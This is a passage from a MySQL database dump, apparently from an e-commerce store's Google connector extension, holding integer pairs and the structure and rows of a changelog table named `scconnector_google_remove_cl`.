(43285, 1449),
(43286, 1450),
(43287, 1451),
(43288, 1452),
(43289, 1453),
(43290, 1454),
(43291, 1455),
(43292, 1456),
(43293, 1457),
(43294, 1458),
(43295, 1459),
(43296, 1460),
(43297, 1461),
(43298, 1462),
(43299, 1463),
(43300, 1464),
(43301, 1465),
(43302, 1466),
(43303, 1467),
(43304, 1468),
(43305, 1469),
(43306, 1470),
(43307, 1471),
(43308, 1472),
(43309, 1473),
(43310, 1474),
(43311, 1475),
(43312, 1476),
(43313, 1477),
(43314, 1478),
(43315, 1479),
(43316, 1480),
(43317, 1481),
(43318, 1482),
(43319, 1483),
(43320, 1484),
(43321, 1485),
(43322, 1486),
(43323, 1487),
(43324, 1488),
(43325, 1489),
(43326, 1490),
(43327, 1491),
(43328, 1492),
(43329, 1493),
(43330, 1494),
(43331, 1495),
(43332, 1496),
(43333, 1497),
(43334, 1498),
(43335, 1499),
(43336, 1500),
(43337, 1501),
(43338, 1502),
(43339, 1503),
(43340, 1504),
(43341, 1505),
(43342, 1506),
(43343, 1507),
(43344, 1508),
(43345, 1509),
(43346, 1510),
(43347, 1511),
(43348, 1512),
(43349, 1513),
(43350, 1514),
(43351, 1515),
(43352, 1516),
(43353, 1517),
(43354, 1518),
(43355, 1519),
(43356, 1520),
(43357, 1521),
(43358, 1522),
(43359, 1523),
(43360, 1524),
(43361, 1525),
(43362, 1526),
(43363, 1527),
(43364, 1528),
(43365, 1529),
(43366, 1530),
(43367, 1531),
(43368, 1532),
(43369, 1533),
(43370, 1534),
(43371, 1535),
(43372, 1536),
(43373, 1537),
(43374, 1538),
(43375, 1539),
(43376, 1540),
(43377, 1541),
(43378, 1542),
(43379, 1543),
(43380, 1544),
(43381, 1545),
(43382, 1546),
(43383, 1547),
(43384, 1548),
(43385, 1549),
(43386, 1550),
(43387, 1551),
(43388, 1552),
(43389, 1553),
(43390, 1554),
(43391, 1555),
(43392, 1556),
(43393, 1557),
(43394, 1558),
(43395, 1559),
(43396, 1560),
(43397, 1561),
(43398, 1562),
(43399, 1563),
(43400, 1564),
(43401, 1565),
(43402, 1566),
(43403, 1567),
(43404, 1568),
(43405, 1569),
(43406, 1570),
(43407, 1571),
(43408, 1572),
(43409, 1573),
(43410, 1574),
(43411, 1575),
(43412, 1576),
(43413, 1577),
(43414, 1578),
(43415, 1579),
(43416, 1580),
(43417, 1581),
(43418, 1582),
(43419, 1583),
(43420, 1584),
(43421, 1585),
(43423, 2059),
(43424, 2059),
(43425, 2059),
(43426, 2058),
(43427, 2058),
(43428, 2058),
(43429, 2061),
(43430, 2061),
(43431, 2061),
(43432, 2061),
(43433, 2061),
(43434, 2061),
(43435, 2061),
(43436, 2061),
(43437, 2061),
(43438, 2061),
(43439, 2061),
(43440, 2061),
(43441, 2061),
(43442, 2061),
(43443, 2061),
(43444, 2061),
(43445, 2061),
(43446, 2061),
(43447, 2061),
(43448, 2061),
(43449, 2061),
(43450, 2061),
(43451, 2061),
(43452, 2061),
(43453, 2061),
(43454, 2061),
(43455, 2062),
(43456, 2062),
(43457, 2062),
(43458, 2062),
(43459, 2062),
(43460, 2062),
(43461, 2062),
(43462, 2062),
(43463, 2062),
(43464, 2062),
(43465, 2062),
(43466, 2062),
(43467, 2062),
(43468, 2063),
(43469, 2063),
(43470, 2063),
(43471, 2063),
(43472, 2063),
(43473, 2063),
(43474, 2063),
(43475, 2063),
(43476, 2063),
(43477, 2063),
(43478, 2063),
(43479, 2063),
(43480, 2063),
(43481, 2061),
(43482, 2061),
(43483, 2061),
(43484, 2061),
(43485, 2061),
(43486, 2061),
(43487, 2061),
(43488, 2061),
(43489, 2061),
(43490, 2061),
(43491, 2061),
(43492, 2061),
(43493, 2061),
(43494, 2061),
(43495, 2054),
(43496, 2054),
(43497, 2054),
(43498, 2054),
(43499, 2054),
(43500, 2054),
(43501, 2054),
(43502, 2054),
(43503, 2054),
(43504, 2054),
(43505, 2060),
(43506, 2060),
(43507, 2060),
(43508, 2060),
(43509, 2060),
(43510, 2060),
(43511, 2060),
(43512, 2060),
(43513, 2060),
(43514, 2060),
(43515, 2057),
(43516, 2057),
(43517, 2057),
(43518, 2057),
(43519, 2057),
(43520, 2057),
(43521, 2057),
(43522, 2057),
(43523, 2057),
(43524, 2057),
(43525, 2057),
(43526, 2055),
(43527, 2055),
(43528, 2055),
(43529, 2055),
(43530, 2055),
(43531, 2055),
(43532, 2055),
(43533, 2055),
(43534, 2055),
(43535, 2055),
(43536, 2058),
(43537, 2058),
(43538, 2058),
(43539, 2058),
(43540, 2058),
(43541, 2058),
(43542, 2058),
(43543, 2058),
(43544, 2058),
(43545, 2058),
(43546, 4),
(43547, 1586),
(43548, 1587),
(43549, 1588),
(43550, 1589),
(43551, 1590),
(43552, 1591),
(43553, 1592),
(43554, 1593),
(43555, 1594),
(43556, 1595),
(43557, 1596),
(43558, 1597),
(43559, 1598),
(43560, 1599),
(43561, 1600),
(43562, 1601),
(43563, 1602),
(43564, 1603),
(43565, 1604),
(43566, 1605),
(43567, 1606),
(43568, 1607),
(43569, 1608),
(43570, 1609),
(43571, 1610),
(43572, 1611),
(43573, 1612),
(43574, 1613),
(43575, 1614),
(43576, 1615),
(43577, 1616),
(43578, 1617),
(43579, 1618),
(43580, 1619),
(43581, 1620),
(43582, 1621),
(43583, 1622),
(43584, 1623),
(43585, 1624),
(43586, 1625),
(43587, 1626),
(43588, 1627),
(43589, 1628),
(43590, 1629),
(43591, 1630),
(43592, 1631),
(43593, 1632),
(43594, 1633),
(43595, 1634),
(43596, 1635),
(43597, 1636),
(43598, 1637),
(43599, 1638),
(43600, 1639),
(43601, 1640),
(43602, 1641),
(43603, 1642),
(43604, 1643),
(43605, 1644),
(43606, 1645),
(43607, 1646),
(43608, 1647),
(43609, 1648),
(43610, 1649),
(43611, 1650),
(43612, 1651),
(43613, 1652),
(43614, 1653),
(43615, 1654),
(43616, 1655),
(43617, 1656),
(43618, 1657),
(43619, 1658),
(43620, 1659),
(43621, 1660),
(43622, 1661),
(43623, 1662),
(43624, 1663),
(43625, 1664),
(43626, 1665),
(43627, 1666),
(43628, 1667),
(43629, 1668),
(43630, 1669),
(43631, 1670),
(43632, 1671),
(43633, 1672),
(43634, 1673),
(43635, 1674),
(43636, 1675),
(43637, 1676),
(43638, 1677),
(43639, 1678),
(43640, 1679),
(43641, 1680),
(43642, 1681),
(43643, 1682),
(43644, 1683),
(43645, 1684),
(43646, 1685),
(43647, 1686),
(43648, 1687),
(43649, 1688),
(43650, 1689),
(43651, 1690),
(43652, 1691),
(43653, 1692),
(43654, 1693),
(43655, 1694),
(43656, 1695),
(43657, 1696),
(43658, 1697),
(43659, 1698),
(43660, 1699),
(43661, 1700),
(43662, 1701),
(43663, 1702),
(43664, 1703),
(43665, 1704),
(43666, 1705),
(43667, 1706),
(43668, 1707),
(43669, 1708),
(43670, 1709),
(43671, 1710),
(43672, 1711),
(43673, 1712),
(43674, 1713),
(43675, 1714),
(43676, 1715),
(43677, 1716),
(43678, 1717),
(43679, 1718),
(43680, 1719),
(43681, 1720),
(43682, 1721),
(43683, 1722),
(43684, 1723),
(43685, 1724),
(43686, 1725),
(43687, 1726),
(43688, 1727),
(43689, 1728),
(43690, 1729),
(43691, 1730),
(43692, 1731),
(43693, 1732),
(43694, 1733),
(43695, 1734),
(43696, 1735),
(43697, 1736),
(43698, 1737),
(43699, 1738),
(43700, 1739),
(43701, 1740),
(43702, 1741),
(43703, 1742),
(43704, 1743),
(43705, 1744),
(43706, 1745),
(43707, 1746),
(43708, 1747),
(43709, 1748),
(43710, 1749),
(43711, 1750),
(43712, 1751),
(43713, 1752),
(43714, 1753),
(43715, 1754),
(43716, 1755),
(43717, 1756),
(43718, 1757),
(43719, 1758),
(43720, 1759),
(43721, 1760),
(43722, 1761),
(43723, 1762),
(43724, 1763),
(43725, 1764),
(43726, 1765),
(43727, 1766),
(43728, 1767),
(43729, 1768),
(43730, 1769),
(43731, 1770),
(43732, 1771),
(43733, 1772),
(43734, 1773),
(43735, 1774),
(43736, 1775),
(43737, 1777),
(43738, 1778),
(43739, 1779),
(43740, 1780),
(43741, 1781),
(43742, 1782),
(43743, 1783),
(43744, 1784),
(43745, 1785),
(43746, 1786),
(43747, 1787),
(43748, 1788),
(43749, 1789),
(43750, 1790),
(43751, 1791),
(43752, 1792),
(43753, 1793),
(43754, 1794),
(43755, 1795),
(43756, 1796),
(43757, 1797),
(43758, 1798),
(43759, 1799),
(43760, 1800),
(43761, 1801),
(43762, 1802),
(43763, 1803),
(43764, 1804),
(43765, 1805),
(43766, 1806),
(43767, 1807),
(43768, 1808),
(43769, 1809),
(43770, 1810),
(43771, 1811),
(43772, 1812),
(43773, 1813),
(43774, 1814),
(43775, 1815),
(43776, 1816),
(43777, 1817),
(43778, 1818),
(43779, 1819),
(43780, 1820),
(43781, 1821),
(43782, 1822),
(43783, 1823),
(43784, 1824),
(43785, 1825),
(43786, 1826),
(43787, 1827),
(43788, 1828),
(43789, 1829),
(43790, 1830),
(43791, 1831),
(43792, 1832),
(43793, 1833),
(43794, 1834),
(43795, 1835),
(43796, 1836),
(43797, 1837),
(43798, 1838),
(43799, 1839),
(43800, 1840),
(43801, 1841),
(43802, 1842),
(43803, 1843),
(43804, 1844),
(43805, 1845),
(43806, 1846),
(43807, 1847),
(43808, 1848),
(43809, 1849),
(43810, 1850),
(43811, 1851),
(43812, 1852),
(43813, 1853),
(43814, 1854),
(43815, 1855),
(43816, 1856),
(43817, 1857),
(43818, 1858),
(43819, 1859),
(43820, 1860),
(43821, 1861),
(43822, 1862),
(43823, 1863),
(43824, 1864),
(43825, 1865),
(43826, 1866),
(43827, 1867),
(43828, 1868),
(43829, 1869),
(43830, 1870),
(43831, 1871),
(43832, 1872),
(43833, 1873),
(43834, 1874),
(43835, 1875),
(43836, 1876),
(43837, 1877),
(43838, 1878),
(43839, 1879),
(43840, 1880),
(43841, 1881),
(43842, 1882),
(43843, 1883),
(43844, 1884),
(43845, 1885),
(43846, 1886),
(43847, 1887),
(43848, 1888),
(43849, 1889),
(43850, 1890),
(43851, 1891),
(43852, 1892),
(43853, 1893),
(43854, 1894),
(43855, 1895),
(43856, 1896),
(43857, 1897),
(43858, 1898),
(43859, 1899),
(43860, 1900),
(43861, 1901),
(43862, 1902),
(43863, 1903),
(43864, 1904),
(43865, 1905),
(43866, 1906),
(43867, 1907),
(43868, 1908),
(43869, 1909),
(43870, 1910),
(43871, 1911),
(43872, 1912),
(43873, 1913),
(43874, 1914),
(43875, 1915),
(43876, 1916),
(43877, 1917),
(43878, 1918),
(43879, 1919),
(43880, 1920),
(43881, 1921),
(43882, 1922),
(43883, 1923),
(43884, 1924),
(43885, 1925),
(43886, 1926),
(43887, 1927),
(43888, 1928),
(43889, 1929),
(43890, 1930),
(43891, 1931),
(43892, 1932),
(43893, 1933),
(43894, 1934),
(43895, 1935),
(43896, 1936),
(43897, 1937),
(43898, 1938),
(43899, 1939),
(43900, 1940),
(43901, 1941),
(43902, 1942),
(43903, 1943),
(43904, 1944),
(43905, 1945),
(43906, 1946),
(43907, 1947),
(43908, 1948),
(43909, 1949),
(43910, 1950),
(43911, 1951),
(43912, 1952),
(43913, 1953),
(43914, 1954),
(43915, 1955),
(43916, 1956),
(43917, 1957),
(43918, 1958),
(43919, 1959),
(43920, 1960),
(43921, 1961),
(43922, 1962),
(43923, 1963),
(43924, 1964),
(43925, 1965),
(43926, 1966),
(43927, 1967),
(43928, 1968),
(43929, 1969),
(43930, 1970),
(43931, 1971),
(43932, 1972),
(43933, 1973),
(43934, 1974),
(43935, 1975),
(43936, 1976),
(43937, 1977),
(43938, 1978),
(43939, 1979),
(43940, 1980),
(43941, 1981),
(43942, 1982),
(43943, 1983),
(43944, 1984),
(43945, 1985),
(43946, 1986),
(43947, 1987),
(43948, 1988),
(43949, 1989),
(43950, 1990),
(43951, 1991),
(43952, 1992),
(43953, 1993),
(43954, 1994),
(43955, 1995),
(43956, 1996),
(43957, 1997),
(43958, 1998),
(43959, 1999),
(43960, 2000),
(43961, 2001),
(43962, 2002),
(43963, 2003),
(43964, 2004),
(43965, 2005),
(43966, 2006),
(43967, 2007),
(43968, 2008),
(43969, 2009),
(43970, 2010),
(43971, 2011),
(43972, 2012),
(43973, 2013),
(43974, 2014),
(43975, 2015),
(43976, 2016),
(43977, 2017),
(43978, 2018),
(43979, 2019),
(43980, 2020),
(43981, 2021),
(43982, 2022),
(43983, 2023),
(43984, 2024),
(43985, 2025),
(43986, 2026),
(43987, 2027),
(43988, 2028),
(43989, 2029),
(43990, 2030),
(43991, 2031),
(43992, 2032),
(43993, 2033),
(43994, 2034),
(43995, 2035),
(43996, 2036),
(43997, 2037),
(43998, 2038),
(43999, 2039),
(44000, 2040),
(44001, 2041),
(44002, 2042),
(44003, 2043),
(44004, 2044),
(44005, 2045),
(44006, 2046),
(44007, 2047),
(44008, 2048),
(44009, 2049),
(44010, 2050),
(44011, 2051),
(44012, 2064),
(44013, 2064),
(44014, 2064),
(44015, 2064),
(44016, 2064),
(44017, 2064),
(44018, 2064),
(44019, 2064),
(44020, 2064),
(44021, 2064),
(44022, 2064),
(44023, 2064),
(44024, 2064),
(44025, 2064),
(44026, 2064),
(44027, 2064),
(44028, 2064),
(44029, 2064),
(44030, 2064),
(44031, 2064),
(44032, 2064),
(44033, 2064),
(44034, 2064),
(44035, 2064),
(44036, 2064),
(44037, 2064),
(44038, 2064),
(44039, 2064),
(44040, 2064),
(44041, 2064),
(44042, 2064),
(44043, 2064),
(44044, 2064),
(44045, 2064),
(44046, 2064),
(44047, 2064),
(44048, 2064),
(44049, 2064),
(44050, 2064),
(44051, 2064),
(44052, 2064),
(44053, 2064),
(44054, 2064),
(44055, 2064),
(44056, 2064),
(44057, 2064),
(44058, 2064),
(44059, 2064),
(44060, 2064),
(44061, 2064),
(44062, 2064),
(44063, 2064),
(44064, 2064),
(44065, 2064),
(44066, 2064),
(44067, 2064),
(44068, 2064),
(44069, 2064),
(44070, 2064),
(44071, 2064),
(44072, 2064),
(44073, 2064),
(44074, 2064),
(44075, 2064),
(44076, 2064),
(44077, 2064),
(44078, 2064),
(44079, 2064),
(44080, 2064),
(44081, 2064),
(44082, 2064),
(44083, 2064),
(44084, 2064),
(44085, 2064),
(44086, 2064),
(44087, 2064),
(44088, 2064),
(44089, 2064),
(44090, 2064),
(44091, 2064),
(44092, 2064),
(44093, 2064),
(44094, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `scconnector_google_remove_cl`
--

CREATE TABLE `scconnector_google_remove_cl` (
  `version_id` int(10) UNSIGNED NOT NULL COMMENT 'Version ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='scconnector_google_remove_cl';

--
-- Dumping data for table `scconnector_google_remove_cl`
--

INSERT INTO `scconnector_google_remove_cl` (`version_id`, `entity_id`) VALUES
(16, 4),
(17, 4),
(18, 4),
(19, 4),
(20, 4),
(26, 6),
(27, 6),
(28, 6),
(29, 6),
(30, 6),
(31, 4),
(32, 4),
(33, 7),
(34, 7),
(35, 7),
(36, 7),
(37, 7),
(38, 7),
(39, 7),
(40, 8),
(41, 8),
(42, 8),
(43, 8),
(44, 9),
(45, 9),
(46, 9),
(47, 9),
(48, 9),
(49, 9),
(50, 9),
(51, 10),
(52, 10),
(53, 10),
(54, 10),
(55, 10),
(56, 11),
(57, 11),
(58, 11),
(59, 11),
(60, 11),
(61, 11),
(62, 12),
(63, 12),
(64, 12),
(65, 12),
(66, 12),
(67, 12),
(68, 13),
(69, 13),
(70, 13),
(71, 13),
(72, 13),
(73, 14),
(74, 14),
(75, 14),
(76, 14),
(77, 14),
(78, 15),
(79, 15),
(80, 15),
(81, 15),
(82, 15),
(83, 16),
(84, 16),
(85, 16),
(86, 16),
(87, 16),
(88, 17),
(89, 17),
(90, 17),
(91, 17),
(92, 17),
(93, 17),
(94, 17),
(95, 18),
(96, 18),
(97, 18),
(98, 18),
(99, 18),
(100, 18),
(101, 18),
(102, 19),
(103, 19),
(104, 19),
(105, 19),
(106, 19),
(107, 20),
(108, 20),
(109, 20),
(110, 20),
(111, 20),
(112, 20),
(113, 21),
(114, 21),
(115, 21),
(116, 21),
(117, 21),
(118, 21),
(119, 22),
(120, 22),
(121, 22),
(122, 22),
(123, 22),
(124, 23),
(125, 23),
(126, 23),
(127, 23),
(128, 23),
(129, 23),
(130, 23),
(131, 24),
(132, 24),
(133, 24),
(134, 24),
(135, 24),
(136, 25),
(137, 25),
(138, 25),
(139, 25),
(140, 25),
(141, 26),
(142, 26),
(143, 26),
(144, 26),
(145, 26),
(146, 26),
(147, 26),
(148, 27),
(149, 27),
(150, 27),
(151, 27),
(152, 27),
(153, 28),
(154, 28),
(155, 28),
(156, 28),
(157, 28),
(158, 29),
(159, 29),
(160, 29),
(161, 29),
(162, 29),
(163, 30),
(164, 30),
(165, 30),
(166, 30),
(167, 30),
(168, 31),
(169, 31),
(170, 31),
(171, 31),
(172, 31),
(173, 31),
(174, 31),
(175, 32),
(176, 32),
(177, 32),
(178, 32),
(179, 32),
(180, 32),
(181, 32),
(182, 33),
(183, 33),
(184, 33),
(185, 33),
(186, 33),
(187, 33),
(188, 33),
(189, 34),
(190, 34),
(191, 34),
(192, 34),
(193, 34),
(194, 34),
(195, 34),
(196, 35),
(197, 35),
(198, 35),
(199, 35),
(200, 35),
(201, 35),
(202, 35),
(203, 36),
(204, 36),
(205, 36),
(206, 36),
(207, 36),
(208, 36),
(209, 36),
(210, 37),
(211, 37),
(212, 37),
(213, 37),
(214, 37),
(215, 37),
(216, 37),
(217, 38),
(218, 38),
(219, 38),
(220, 38),
(221, 38),
(222, 38),
(223, 38),
(224, 39),
(225, 39),
(226, 39),
(227, 39),
(228, 39),
(229, 39),
(230, 39),
(231, 40),
(232, 40),
(233, 40),
(234, 40),
(235, 40),
(236, 40),
(237, 41),
(238, 41),
(239, 41),
(240, 41),
(241, 41),
(242, 41),
(243, 42),
(244, 42),
(245, 42),
(246, 42),
(247, 42),
(248, 42),
(249, 43),
(250, 43),
(251, 43),
(252, 43),
(253, 43),
(254, 44),
(255, 44),
(256, 44),
(257, 44),
(258, 44),
(259, 45),
(260, 45),
(261, 45),
(262, 45),
(263, 45),
(264, 45),
(265, 46),
(266, 46),
(267, 46),
(268, 46),
(269, 46),
(270, 46),
(271, 47),
(272, 47),
(273, 47),
(274, 47),
(275, 47),
(276, 47),
(277, 48),
(278, 48),
(279, 48),
(280, 48),
(281, 48),
(282, 48),
(283, 49),
(284, 49),
(285, 49),
(286, 49),
(287, 49),
(288, 49),
(289, 50),
(290, 50),
(291, 50),
(292, 50),
(293, 50),
(294, 51),
(295, 51),
(296, 51),
(297, 51),
(298, 51),
(299, 51),
(300, 52),
(301, 52),
(302, 52),
(303, 52),
(304, 53),
(305, 53),
(306, 53),
(307, 53),
(308, 53),
(309, 53),
(310, 53),
(311, 53),
(312, 53),
(313, 53),
(314, 54),
(315, 54),
(316, 54),
(317, 54),
(318, 54),
(319, 54),
(320, 54),
(321, 54),
(322, 55),
(323, 55),
(324, 55),
(325, 55),
(326, 55),
(327, 55),
(328, 55),
(329, 55),
(330, 56),
(331, 56),
(332, 56),
(333, 56),
(334, 56),
(335, 56),
(336, 56),
(337, 56),
(338, 57),
(339, 57),
(340, 57),
(341, 57),
(342, 57),
(343, 57),
(344, 57),
(345, 57),
(346, 58),
(347, 58),
(348, 58),
(349, 58),
(350, 58),
(351, 58),
(352, 58),
(353, 58),
(354, 59),
(355, 59),
(356, 59),
(357, 59),
(358, 59),
(359, 59),
(360, 59),
(361, 59),
(362, 60),
(363, 61),
(364, 62),
(365, 63),
(366, 64),
(367, 65),
(368, 66),
(369, 67),
(370, 68),
(371, 69),
(372, 70),
(373, 71),
(374, 72),
(375, 73),
(376, 74),
(377, 75),
(378, 76),
(379, 77),
(380, 78),
(381, 79),
(382, 80),
(383, 81),
(384, 82),
(385, 83),
(386, 84),
(387, 85),
(388, 86),
(389, 87),
(390, 88),
(391, 89),
(392, 90),
(393, 91),
(394, 92),
(395, 93),
(396, 94),
(397, 95),
(398, 96),
(399, 97),
(400, 98),
(401, 99),
(402, 100),
(403, 101),
(404, 102),
(405, 103),
(406, 104),
(407, 105),
(408, 106),
(409, 107),
(410, 108),
(411, 109),
(412, 110),
(413, 111),
(414, 112),
(415, 113),
(416, 114),
(417, 115),
(418, 116),
(419, 117),
(420, 118),
(421, 119),
(422, 120),
(423, 121),
(424, 122),
(425, 123),
(426, 124),
(427, 125),
(428, 126),
(429, 127),
(430, 128),
(431, 129),
(432, 130),
(433, 131),
(434, 132),
(435, 133),
(436, 134),
(437, 135),
(438, 136),
(439, 137),
(440, 138),
(441, 139),
(442, 140),
(443, 141),
(444, 142),
(445, 143),
(446, 144),
(447, 145),
(448, 146),
(449, 147),
(450, 148),
(451, 149),
(452, 150),
(453, 151),
(454, 152),
(455, 153),
(456, 154),
(457, 155),
(458, 156),
(459, 157),
(460, 158),
(461, 159),
(462, 60),
(463, 61),
(464, 62),
(465, 63),
(466, 64),
(467, 65),
(468, 66),
(469, 67),
(470, 68),
(471, 69),
(472, 70),
(473, 71),
(474, 72),
(475, 73),
(476, 74),
(477, 75),
(478, 76),
(479, 77),
(480, 78),
(481, 79),
(482, 80),
(483, 81),
(484, 82),
(485, 83),
(486, 84),
(487, 85),
(488, 86),
(489, 87),
(490, 88),
(491, 89),
(492, 90),
(493, 91),
(494, 92),
(495, 93),
(496, 94),
(497, 95),
(498, 96),
(499, 97),
(500, 98),
(501, 99),
(502, 100),
(503, 101),
(504, 102),
(505, 103),
(506, 104),
(507, 105),
(508, 106),
(509, 107),
(510, 108),
(511, 109),
(512, 110),
(513, 111),
(514, 112),
(515, 113),
(516, 114),
(517, 115),
(518, 116),
(519, 117),
(520, 118),
(521, 119),
(522, 120),
(523, 121),
(524, 122),
(525, 123),
(526, 124),
(527, 125),
(528, 126),
(529, 127),
(530, 128),
(531, 129),
(532, 130),
(533, 131),
(534, 132),
(535, 133),
(536, 134),
(537, 135),
(538, 136),
(539, 137),
(540, 138),
(541, 139),
(542, 140),
(543, 141),
(544, 142),
(545, 143),
(546, 144),
(547, 145),
(548, 146),
(549, 147),
(550, 148),
(551, 149),
(552, 150),
(553, 151),
(554, 152),
(555, 153),
(556, 154),
(557, 155),
(558, 156),
(559, 157),
(560, 158),
(561, 159),
(562, 60),
(563, 60),
(564, 60),
(565, 60),
(566, 60),
(567, 60),
(568, 61),
(569, 61),
(570, 61),
(571, 61),
(572, 61),
(573, 61),
(574, 62),
(575, 62),
(576, 62),
(577, 62),
(578, 62),
(579, 62),
(580, 63),
(581, 63),
(582, 63),
(583, 63),
(584, 63),
(585, 63),
(586, 64),
(587, 64),
(588, 64),
(589, 64),
(590, 64),
(591, 64),
(592, 65),
(593, 65),
(594, 65),
(595, 65),
(596, 65),
(597, 65),
(598, 66),
(599, 66),
(600, 66),
(601, 66),
(602, 66),
(603, 66),
(604, 67),
(605, 67),
(606, 67),
(607, 67),
(608, 67),
(609, 67),
(610, 68),
(611, 68),
(612, 68),
(613, 68),
(614, 68),
(615, 68),
(616, 69),
(617, 69),
(618, 69),
(619, 69),
(620, 69),
(621, 69),
(622, 70),
(623, 70),
(624, 70),
(625, 70),
(626, 70),
(627, 70),
(628, 71),
(629, 71),
(630, 71),
(631, 71),
(632, 71),
(633, 71),
(634, 72),
(635, 72),
(636, 72),
(637, 72),
(638, 72),
(639, 72),
(640, 73),
(641, 73),
(642, 73),
(643, 73),
(644, 73),
(645, 73),
(646, 74),
(647, 74),
(648, 74),
(649, 74),
(650, 74),
(651, 74),
(652, 75),
(653, 75),
(654, 75),
(655, 75),
(656, 75),
(657, 75),
(658, 75),
(659, 75),
(660, 75),
(661, 76),
(662, 76),
(663, 76),
(664, 76),
(665, 76),
(666, 76),
(667, 77),
(668, 77),
(669, 77),
(670, 77),
(671, 77),
(672, 77),
(673, 78),
(674, 78),
(675, 78),
(676, 78),
(677, 78),
(678, 78),
(679, 79),
(680, 79),
(681, 79),
(682, 79),
(683, 79),
(684, 79),
(685, 80),
(686, 80),
(687, 80),
(688, 80),
(689, 80),
(690, 80),
(691, 81),
(692, 81),
(693, 81),
(694, 81),
(695, 81),
(696, 81),
(697, 82),
(698, 82),
(699, 82),
(700, 82),
(701, 82),
(702, 82),
(703, 83),
(704, 83),
(705, 83),
(706, 83),
(707, 83),
(708, 83),
(709, 84),
(710, 84),
(711, 84),
(712, 84),
(713, 84),
(714, 84),
(715, 85),
(716, 85),
(717, 85),
(718, 85),
(719, 85),
(720, 85),
(721, 86),
(722, 86),
(723, 86),
(724, 86),
(725, 86),
(726, 86),
(727, 87),
(728, 87),
(729, 87),
(730, 87),
(731, 87),
(732, 87),
(733, 88),
(734, 88),
(735, 88),
(736, 88),
(737, 88),
(738, 88),
(739, 89),
(740, 89),
(741, 89),
(742, 89),
(743, 89),
(744, 89),
(745, 90),
(746, 90),
(747, 90),
(748, 90),
(749, 90),
(750, 90),
(751, 91),
(752, 91),
(753, 91),
(754, 91),
(755, 91),
(756, 91),
(757, 91),
(758, 91),
(759, 91),
(760, 92),
(761, 92),
(762, 92),
(763, 92),
(764, 92),
(765, 92),
(766, 93),
(767, 93),
(768, 93),
(769, 93),
(770, 93),
(771, 93),
(772, 94),
(773, 94),
(774, 94),
(775, 94),
(776, 94),
(777, 94),
(778, 95),
(779, 95),
(780, 95),
(781, 95),
(782, 95),
(783, 95),
(784, 96),
(785, 96),
(786, 96),
(787, 96),
(788, 96),
(789, 96),
(790, 97),
(791, 97),
(792, 97),
(793, 97),
(794, 97),
(795, 97),
(796, 98),
(797, 98),
(798, 98),
(799, 98),
(800, 98),
(801, 98),
(802, 99),
(803, 99),
(804, 99),
(805, 99),
(806, 99),
(807, 99),
(808, 100),
(809, 100),
(810, 100),
(811, 100),
(812, 100),
(813, 100),
(814, 101),
(815, 101),
(816, 101),
(817, 101),
(818, 101),
(819, 101),
(820, 102),
(821, 102),
(822, 102),
(823, 102),
(824, 102),
(825, 102),
(826, 103),
(827, 103),
(828, 103),
(829, 103),
(830, 103),
(831, 103),
(832, 104),
(833, 104),
(834, 104),
(835, 104),
(836, 104),
(837, 104),
(838, 105),
(839, 105),
(840, 105),
(841, 105),
(842, 105),
(843, 105),
(844, 106),
(845, 106),
(846, 106),
(847, 106),
(848, 106),
(849, 106),
(850, 107),
(851, 107),
(852, 107),
(853, 107),
(854, 107),
(855, 107),
(856, 107),
(857, 107),
(858, 107),
(859, 108),
(860, 108),
(861, 108),
(862, 108),
(863, 108),
(864, 108),
(865, 109),
(866, 109),
(867, 109),
(868, 109),
(869, 109),
(870, 109),
(871, 110),
(872, 110),
(873, 110),
(874, 110),
(875, 110),
(876, 110),
(877, 111),
(878, 111),
(879, 111),
(880, 111),
(881, 111),
(882, 111),
(883, 112),
(884, 112),
(885, 112),
(886, 112),
(887, 112),
(888, 112),
(889, 113),
(890, 113),
(891, 113),
(892, 113),
(893, 113),
(894, 113),
(895, 114),
(896, 114),
(897, 114),
(898, 114),
(899, 114),
(900, 114),
(901, 115),
(902, 115),
(903, 115),
(904, 115),
(905, 115),
(906, 115),
(907, 116),
(908, 116),
(909, 116),
(910, 116),
(911, 116),
(912, 116),
(913, 117),
(914, 117),
(915, 117),
(916, 117),
(917, 117),
(918, 117),
(919, 118),
(920, 118),
(921, 118),
(922, 118),
(923, 118),
(924, 118),
(925, 119),
(926, 119),
(927, 119),
(928, 119),
(929, 119),
(930, 119),
(931, 120),
(932, 120),
(933, 120),
(934, 120),
(935, 120),
(936, 120),
(937, 121),
(938, 121),
(939, 121),
(940, 121),
(941, 121),
(942, 121),
(943, 122),
(944, 122),
(945, 122),
(946, 122),
(947, 122),
(948, 122),
(949, 123),
(950, 123),
(951, 123),
(952, 123),
(953, 123),
(954, 123),
(955, 123),
(956, 123),
(957, 123),
(958, 124),
(959, 124),
(960, 124),
(961, 124),
(962, 124),
(963, 124),
(964, 125),
(965, 125),
(966, 125),
(967, 125),
(968, 125),
(969, 125),
(970, 126),
(971, 126),
(972, 126),
(973, 126),
(974, 126),
(975, 126),
(976, 127),
(977, 127),
(978, 127),
(979, 127),
(980, 127),
(981, 127),
(982, 128),
(983, 128),
(984, 128),
(985, 128),
(986, 128),
(987, 128),
(988, 129),
(989, 129),
(990, 129),
(991, 129),
(992, 129),
(993, 129),
(994, 130),
(995, 130),
(996, 130),
(997, 130),
(998, 130),
(999, 130),
(1000, 131),
(1001, 131),
(1002, 131),
(1003, 131),
(1004, 131),
(1005, 131),
(1006, 132),
(1007, 132),
(1008, 132),
(1009, 132),
(1010, 132),
(1011, 132),
(1012, 133),
(1013, 133),
(1014, 133),
(1015, 133),
(1016, 133),
(1017, 133),
(1018, 134),
(1019, 134),
(1020, 134),
(1021, 134),
(1022, 134),
(1023, 134),
(1024, 135),
(1025, 135),
(1026, 135),
(1027, 135),
(1028, 135),
(1029, 135),
(1030, 136),
(1031, 136),
(1032, 136),
(1033, 136),
(1034, 136),
(1035, 136),
(1036, 137),
(1037, 137),
(1038, 137),
(1039, 137),
(1040, 137),
(1041, 137),
(1042, 138),
(1043, 138),
(1044, 138),
(1045, 138),
(1046, 138),
(1047, 138),
(1048, 139),
(1049, 139),
(1050, 139),
(1051, 139),
(1052, 139),
(1053, 139),
(1054, 139),
(1055, 139),
(1056, 139),
(1057, 140),
(1058, 140),
(1059, 140),
(1060, 140),
(1061, 140),
(1062, 140),
(1063, 141),
(1064, 141),
(1065, 141),
(1066, 141),
(1067, 141),
(1068, 141),
(1069, 142),
(1070, 142),
(1071, 142),
(1072, 142),
(1073, 142),
(1074, 142),
